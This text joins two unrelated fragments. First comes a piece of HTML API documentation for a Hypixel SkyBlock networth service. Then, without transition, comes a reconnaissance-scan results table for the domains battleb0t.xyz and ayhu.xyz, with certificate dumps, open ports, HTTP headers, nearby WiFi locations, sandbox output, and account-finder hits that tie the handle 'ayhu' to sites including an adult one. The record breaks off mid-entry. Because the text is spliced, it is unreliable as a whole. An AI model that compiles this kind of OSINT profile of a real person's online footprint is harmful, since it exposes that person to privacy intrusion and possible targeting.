<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code>/v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>This can be the UUID of a user or the name</td>
</tr>
<tr>
<td>profile</td>
<td>This can be the users profile id or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types that are used to describe an item's calculation</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | xfinitywifi (Net ID: 00:0D:67:37:7A:7A) | 39.0469, -77.4903 |
| 2023-05-12 03:09:07 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 165.232.113.89 | 165.232.113.85 |
| 2023-05-12 03:00:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.37): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | ExtraLunchMoney (Category: XXXPORNXXX)
https://extralunchmoney.com/user/login | login |
| 2023-05-12 02:44:15 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:2c:84:3a:08:10:23:75:f2:8a:d5:a0:cb:cc:f6:da:14:6e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:32:07 2022 GMT
Not After : Mar 27 01:32:06 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 27 02:32:07.311 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:AA:9D:DE:C7:1A:03:CE:A4:C0:00:4F:
87:A8:C3:99:28:44:9B:D2:01:EB:31:A5:4D:CA:E6:87:
EC:A0:EC:55:A7:02:20:46:FF:BE:46:93:AD:B8:EF:FE:
25:F8:15:56:F7:DA:CF:93:CC:B6:57:60:7E:B3:1F:4E:
3D:D7:BC:FE:3F:5C:95
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 27 02:32:07.904 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:37:07:AC:16:A5:95:2E:57:A3:0B:B3:64:
CD:EA:6B:54:2E:81:8A:01:52:42:FF:1C:53:89:7A:D2:
6B:24:50:80:02:20:40:76:C6:34:39:4A:07:B1:8F:D5:
9F:21:37:77:6A:98:1B:06:80:4F:64:F6:8D:4F:C6:A8:
76:64:CB:D7:21:98
Signature Algorithm: sha256WithRSAEncryption
5a:91:30:6e:b9:53:94:e1:7e:bb:e0:98:45:df:78:b3:43:5d:
de:b7:e8:48:7b:6b:85:d8:3d:1f:0c:8e:55:6a:96:e0:1e:5a:
3f:a6:43:96:72:8b:0f:19:07:ee:9c:42:c7:4a:fa:00:d6:38:
45:8a:ea:1d:27:96:1c:3b:da:42:ff:fd:72:61:04:85:27:14:
44:a3:15:9a:66:dc:fe:95:f3:8c:98:0f:18:5b:f9:85:a2:67:
99:97:5a:de:6b:1e:8a:f6:0f:26:41:36:b4:b1:3e:27:57:59:
6e:d6:c4:ee:ce:b2:6c:21:fe:aa:fe:21:90:56:0b:ea:b9:fb:
42:2f:c1:77:37:3f:05:10:f5:44:c7:f2:f2:69:75:ed:35:ad:
bf:14:45:0f:8e:50:cc:75:c2:b4:48:82:8d:27:02:be:21:98:
49:ee:ec:f9:0b:27:d8:83:27:62:ad:0a:7b:66:8c:06:c8:72:
57:56:3c:6b:ac:63:49:11:4f:62:ea:70:01:53:cf:56:53:4b:
71:08:c9:75:ee:50:8f:d1:87:f6:68:91:33:35:2a:99:1f:6e:
f5:48:cb:c7:f5:99:a1:3f:39:b8:fe:33:3a:31:fe:e7:7d:d5:
4e:6f:92:4f:57:86:fc:b0:8f:23:98:3e:8f:91:f6:d5:3d:5c:
a6:e5:1c:71
| battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ThermiCam2Production TRC (Net ID: 00:05:FE:C6:35:F0) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:55:27 | Physical Location | No | URLScan.io | 0 | 0 | 1 | 0 | None | US | ayhu.xyz |
| 2023-05-12 02:54:18 | HTTP Status Code | No | Web Spider | 0 | 0 | 2 | 0 | None | 200 | pics.battleb0t.xyz |
| 2023-05-12 02:54:13 | Web Content | No | Web Spider | 0 | 0 | 3 | 0 | None | *{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131}html,button{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,"Apple Color Emoji","Segoe UI Emoji",Segoe UI Symbol,"Noto Color Emoji"}body{display:flex;flex-direction:column;min-height:100vh}a{transition:color .15s ease;background-color:transparent;text-decoration:none;color:#0051c3}a:hover{text-decoration:underline;color:#ee730a}.hidden{display:none}.main-content{margin:8rem auto;width:100%;max-width:60rem}.heading-favicon{margin-right:.5rem;width:2rem;height:2rem}@media (max-width: 720px){.main-content{margin-top:4rem}.heading-favicon{width:1.5rem;height:1.5rem}}.main-content,.footer{padding-right:1.5rem;padding-left:1.5rem}.main-wrapper{display:flex;flex:1;flex-direction:column;align-items:center}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{line-height:3.75rem;font-size:2.5rem;font-weight:500}.h2{line-height:2.25rem;font-size:1.5rem;font-weight:500}.core-msg{line-height:2.25rem;font-size:1.5rem;font-weight:400}.body-text{line-height:1.25rem;font-size:1rem;font-weight:400}.expandable-title{line-height:1.5rem;font-weight:500}@media (max-width: 720px){.h1{line-height:1.75rem;font-size:1.5rem}.h2{line-height:1.5rem;font-size:1.25rem}.core-msg{line-height:1.5rem;font-size:1rem}}.icon-wrapper{display:inline-block;position:relative;top:.25rem;margin-right:.2rem}.heading-icon{width:1.625rem;height:1.625rem}@media (max-width: 720px){.heading-icon{width:1.25rem;height:1.25rem}}.warning-icon{display:inline-block;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADQAAAA0CAMAAADypuvZAAAAPFBMVEUAAACvDwOyDwKyDwOvEACyDgOyDwKvDwKwDgCyDgKxDgOyDgKvDgKyDwKyDgOxDgKzDgKxDgKxEASyDwMgW5ZmAAAAE3RSTlMAQN+/EJDvMB9wYJ9Qz7CAf6CAtGoj/AAAAcFJREFUSMeVltu2gyAMRLlfBDxt+f9/PTq2VXSwmod2GdhkEoIiiPmYinK1VqXt4MUFk9bVxlTyvxBdienhNoJwoYMY+57hdMzBTA4v4/gRaykT1FuLNI0/j/1g3i2IJ8s9F+owNCx+2UlWQXbexQFjjTjN1/lGALS9xIm9QIXNOoowlFKrFssYTtmvuOXpp2HtT6lUE3f11bH1IQu9qbYUBEr7yq8zCxkWuva8+rtF4RrkP6ESxFPoj7rtW30+jI4UQlZuiejEwZ4cMg65RKjjUDz6NdwWvxw6nnLESEAl230O5cldUAdy8P44hJZTYh40DOIKzFw3QOI6hPk9aDiFHJc3nMirKERgEPd7FKKgiy5DEn3+5JsrAfHNtfjVRLucTPTaCA1rxFVz6AX8yYsIUlXoMqbPWFUeXF1Cyqz7Ej1PAXNBs1B1tsKWKpsX0yFhslTetL4mL8s4j2fyslTbjbT7Va2V7GCG5ukhftijXdsoQhGmzSI4QhHGhVufz4QJ/v6Hug6dK0EK3YuM8/3Lx5h3Z0STywe55oxRejM5Qo4aAtZ8eTBuWp6dl3IXgfnnLpyzBCFctHomnSopejLhH/3AMfEMndTJAAAAAElFTkSuQmCC);background-size:cover}.text-center{text-align:center}.expandable{transition:height,border-left .2s;border-left:.125rem solid #e5e5e5;padding-left:.5rem}.expandable.expanded{border-left-color:#0051c3}.expandable-summary-btn{border:none;background:none;cursor:pointer;padding:0;color:inherit;font:inherit}.expandable-details{display:none;padding:.5rem 0}.expanded>.expandable-details{display:block}.caret-icon{display:inline-block;transition:transform .2s;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgBAMAAACBVGfHAAAAElBMVEUAAAAwMDAxMTEyMjIwMDAxMTF+89HTAAAABXRSTlMAgF9/MMasjJIAAABTSURBVCjPzcq7DcAwDANR5TOAm/Rp0meErBAD3n8VW8DBt4JZUALxYp18vmfWUR2ed9TW7iB7K3muOsGfDRFAABKABCABSAASgAQgAUgAkhKLpwMJmwrD+BDiYwAAAABJRU5ErkJggg==);background-size:contain;width:1rem;height:1rem}.caret-icon-wrapper{position:relative;top:.1rem;margin-left:.2rem}.expanded .caret-icon{transform:rotate(180deg)}.big-button{transition-duration:.2s;transition-property:background-color,border-color,color;transition-timing-function:ease;border:.063rem solid #0051c3;border-radius:.313rem;padding:.375rem 1rem;line-height:1.313rem;font-size:.875rem}.big-button:hover{cursor:pointer}.captcha-prompt:not(.hidden){display:flex}@media (max-width: 720px){.captcha-prompt:not(.hidden){flex-wrap:wrap;justify-content:center}}.pow-button{margin:2rem 0;background-color:#0051c3;color:#fff}.pow-button:hover{border-color:#003681;background-color:#003681;color:#fff}.footer{margin:0 auto;width:100%;max-width:60rem;line-height:1.125rem;font-size:.75rem}.footer-inner{border-top:1px solid #d9d9d9;padding-top:1rem;padding-bottom:1rem}.ip-address{margin-left:2.25rem}.clearfix:after{display:table;clear:both;content:""}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-id{text-align:center}.footer .ray-id code{font-family:monaco,courier,monospace}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (max-width: 720px){.diagnostic-wrapper{display:flex;flex-wrap:wrap;justify-content:center}.clearfix:after{display:initial;clear:none;text-align:center;content:none}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative;width:1.875rem;height:1.875rem}.lds-ring div{box-sizing:border-box;display:block;position:absolute;border:.3rem solid #595959;border-radius:50%;border-color:#595959 transparent transparent;width:1.875rem;height:1.875rem;animation:lds-ring 1.2s cubic-bezier(.5,0,.5,1) infinite}.lds-ring div:nth-child(1){animation-delay:-.45s}.lds-ring div:nth-child(2){animation-delay:-.3s}.lds-ring div:nth-child(3){animation-delay:-.15s}@keyframes lds-ring{0%{transform:rotate(0)}to{transform:rotate(360deg)}}@media screen and (-ms-high-contrast: active),screen and (-ms-high-contrast: none){body,.main-wrapper{display:block}}body.no-js .loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}@media (prefers-color-scheme: dark){body{background-color:#222;color:#d9d9d9}a{color:#fff}a:hover{text-decoration:underline;color:#ee730a}.lds-ring div{border-color:#999 transparent transparent}.font-red{color:#fc574a}.big-button,.pow-button{background-color:#4693ff;color:#1d1d1d}.expandable.expanded{border-left-color:#4693ff}}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{text-decoration:underline;color:#ee730a}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font-red{color:#b20f03}body.dark .big-button,body.dark .pow-button{background-color:#4693ff;color:#1d1d1d}body.dark .expandable.expanded{border-left-color:#4693ff}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{text-decoration:underline;color:#ee730a}body.light .lds-ring div{border-color:#595959 transparent transparent}body.light .font-red{color:#fc574a}body.light .big-button,body.light .pow-button{border-color:#003681;background-color:#003681;color:#fff}body.light .expandable.expanded{border-left-color:#0051c3} | https://ayhu.xyz/cdn-cgi/styles/challenges.css |
| 2023-05-12 03:27:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.138:80 | 188.114.96.0/24 |
| 2023-05-12 02:45:34 | DNS TXT Record | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | v=spf1 include:_spf.mx.cloudflare.net ~all | battleb0t.xyz |
| 2023-05-12 03:32:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.13:8080 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | my_instants (Category: music)
https://www.myinstants.com/en/profile/login/ | login |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.176): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | hk (Net ID: 00:02:A8:1F:B9:47) | 50.1188, 8.6843 |
| 2023-05-12 03:23:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.7:8443 | 188.114.96.0/24 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNetFBC6 (Net ID: 00:01:36:5A:FB:C4) | 37.780462,-122.390564 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | United States | ecash-pay.com |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | cf-ray: 7c5f60726fad1912-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:53:07 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.111.154:80 | 185.199.111.0/24 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Twitter (Category: social)
https://twitter.com/ayhu | ayhu |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["7c5e66b449bc299e-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 188.114.96.1 |
| 2023-05-12 02:53:35 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.110.153:443 | 185.199.110.153 |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 007.github.io | 185.199.111.153 |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.220): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:19 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | application/javascript | https://fluid.battleb0t.xyz/./script.js |
| 2023-05-12 02:53:02 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | nwapi.battleb0t.xyz |
| 2023-05-12 02:54:30 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 14061 | 64.226.81.43 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Frodo (Net ID: 00:02:2D:25:7C:6A) | 37.7642, -122.3993 |
| 2023-05-12 02:47:29 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"docs.verapdf.org"\n "maxcdn.bootstrapcdn.com"\n "software.verapdf.org"\n "staging.verapdf.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.104.134.96:80"\n "172.104.134.96:443"\n "104.18.11.207:443"\n "172.64.132.15:443"\n "185.199.111.153:80"\n "142.250.189.202:443"\n "185.199.111.153:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f2c_IESQMMUTEX_0_519"\n "IsoScope_f2c_IE_EarlyTabStart_0x9b4_Mutex"\n "IsoScope_f2c_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_f2c_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_f2c_ConnHashTable<3884>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f2c_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"software.verapdf.org"\n "docs.verapdf.org"\n "staging.verapdf.org"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarD2EE.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /dev/verapdf_windows-x64_1_18-rc.exe HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: software.verapdf.org" (Indicator: "mozilla/5.0 (")\n "GET /dev/verapdf_windows-x64_1_18-rc.exe HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: software.verapdf.org" (Indicator: "user-agent: ")\n "GET /wp-content/themes/veraPDF-site/includes/js/ie10-viewport-bug-workaround.js?ver=4.5.3 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: staging.verapdf.org" (Indicator: "mozilla/5.0 (")\n "GET /wp-content/themes/veraPDF-site/includes/js/ie10-viewport-bug-workaround.js?ver=4.5.3 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: staging.verapdf.org" (Indicator: "user-agent: ")\n "GET /wp-content/themes/veraPDF-site/includes/js/bootstrap-wp.js?ver=1.11.3 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: staging.verapdf.org" (Indicator: "mozilla/5.0 (")\n "GET /wp-content/themes/veraPDF-site/includes/js/bootstrap-wp.js?ver=1.11.3 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: staging.verapdf.org" (Indicator: "user-agent: ")\n "GET /bootstrap/3.3.6/js/bootstrap.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: maxcdn.bootstrapcdn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /bootstrap/3.3.6/js/bootstrap.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: maxcdn.bootstrapcdn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /bootstrap/3.3.6/css/bootstrap-theme.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: maxcdn.bootstrapcdn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /bootstrap/3.3.6/css/bootstrap-theme.min.css HTTP/1.1\nAccept: text/css, 